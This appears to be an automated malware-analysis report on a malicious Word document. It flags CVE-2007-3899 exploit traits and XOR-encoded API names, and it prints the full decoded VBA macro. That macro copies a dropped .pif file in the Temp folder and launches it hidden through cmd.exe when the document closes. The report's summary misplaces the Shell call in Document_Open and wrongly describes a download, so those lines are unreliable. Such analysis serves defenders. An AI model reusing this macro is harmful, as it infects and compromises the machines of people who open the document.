MALICIOUS
498
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
T1059.003 Windows Command Shell
The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, indicated by critical heuristics like CVE_2007_3899 and SC_STR_VIRTUALALLOC. The Document_Open macro contains a Shell() call that executes 'cmd.exe /c ping localhost -n 100 && start C:\Users\<user>\AppData\Local\Temp\6C.pif', suggesting it attempts to download and execute a second-stage payload from a temporary file. The Document_Close macro also attempts to execute the same temporary file.
Heuristics 15
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
XOR-encoded strings (key 0xDA) critical SC_XOR_ENCODEDFound 3 Windows library/API name(s) XOR-encoded with single-byte key 0xDA: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'Disassembly hidden — these bytes score as data, not coherent x86 code (no internal branches to corroborate control flow).
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "cmd.exe /c ping localhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Shell "cmd.exe /c ping localhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif" -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 195,072 bytes but its declared streams total only 114,911 bytes — 80,161 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://secure.comodo.net/CPS0C In document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://crl.comodoca.com/COMODORSACodeSigningCA.crl0tIn document text (OLE body)
- http://crt.comodoca.com/COMODORSACodeSigningCA.crt0$In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1327 bytes |
SHA-256: c8c5646a6140c3f3e37eb1d2282e1c2fb2b78934b4ad58e67fbe2061df1852dc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim Str As String
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=13
Selection.TypeBackspace
Selection.Copy
FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif"
Selection.TypeBackspace
Set d = New DataObject
d.SetText " "
d.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
Call Module1.killo
End Sub
Private Sub Document_Close()
Shell "cmd.exe /c ping localhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide
End Sub
Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.